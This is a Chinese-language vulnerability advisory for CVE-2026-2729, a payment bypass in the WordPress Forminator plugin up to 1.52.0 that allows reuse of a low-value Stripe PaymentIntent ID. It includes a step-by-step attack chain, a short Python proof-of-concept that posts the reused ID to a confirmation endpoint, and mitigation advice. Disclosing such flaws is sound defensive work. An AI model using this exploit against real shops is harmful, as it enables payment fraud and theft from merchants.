CVE-2026-2729 CVSS 5.3 中危

CVE-2026-2729 WordPress Forminator授权绕过漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-2729

漏洞类型

授权绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Forminator Plugin

漏洞概述

WordPress Forminator插件在1.52.0及之前的所有版本中存在授权绕过漏洞。该漏洞源于插件在公共支付流程中处理Stripe PaymentIntent标识符时，未能正确验证用户权限及金额对应关系。未经过身份验证的攻击者可利用此漏洞，通过重用之前成功的低价值Stripe支付意图，提交高价值付费表单并标记为已完成，从而导致支付绕过或金额不足。

技术细节

Forminator插件在集成Stripe支付网关处理支付回调时存在逻辑缺陷。插件仅验证了请求中提供的PaymentIntent ID在Stripe侧是否处于“成功”状态，而未执行关键的服务端校验：一是未验证该PaymentIntent ID是否属于当前提交的表单会话；二是未校验PaymentIntent关联的交易金额与当前表单要求支付的金额是否一致。攻击者可首先发起一笔小额支付（如1美元）以获取有效的PaymentIntent ID。随后，在提交高价值表单（如1000美元）的支付确认请求时，通过抓包工具篡改数据，将PaymentIntent ID替换为之前获取的小额ID。由于插件缺乏对ID归属和金额一致性的二次校验，系统误判支付已完成，导致攻击者可以极低代价获取高价值服务或商品。

攻击链分析

STEP 1

侦察

攻击者识别出目标网站使用了存在漏洞的Forminator插件版本（<= 1.52.0），并且启用了Stripe支付功能。

STEP 2

获取有效凭证

攻击者以普通用户身份在网站上发起一笔小额真实支付（例如0.01美元），并从响应或网络流量中获取Stripe返回的PaymentIntent ID。

STEP 3

篡改请求数据

攻击者选择一个高价值的表单或服务进行购买，拦截提交给服务器的支付确认请求，将其中的PaymentIntent ID替换为之前获取的小额支付ID。

STEP 4

利用漏洞

服务器接收到篡改后的请求，仅检查PaymentIntent ID在Stripe系统中是否为“成功”状态，由于检查通过且未比对金额，服务器误认为高价值订单已支付。

STEP 5

达成目标

攻击者成功以小额支付完成了高价值商品的购买流程，实现了支付绕过。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-2729: Authorization Bypass via Payment Intent Reuse
# This script demonstrates the logic flaw where a low-value PaymentIntent ID
# is used to validate a high-value form submission.

import requests

target_url = "http://example.com/wp-json/forminator/v1/payment/confirm"

# 1. Attacker performs a small legitimate payment (e.g. $1) and gets the ID
# Assume 'pi_low_value' is the ID from a successful $1 transaction
low_value_pi = "pi_3AbCdEfGhIjKlMnOpQrStUvWx"

# 2. Attacker prepares a high-value form submission payload
payload = {
    "form_id": "123",
    "entry_id": "456",
    "stripe_payment_intent_id": low_value_pi, # Vulnerability: Reusing low value ID
    "amount": "1000.00", # The actual amount required by the form
    "currency": "USD"
}

# 3. Send the request to complete the payment
response = requests.post(target_url, data=payload)

if response.status_code == 200 and response.json().get('success'):
    print("[+] Exploit successful! Payment bypassed.")
else:
    print("[-] Exploit failed.")

影响范围

Forminator <= 1.52.0

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用Forminator插件的Stripe在线支付功能，转为人工审核订单或使用其他支付方式。同时，管理员应立即检查后台支付记录，排查是否存在支付金额远低于商品价格的异常订单。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表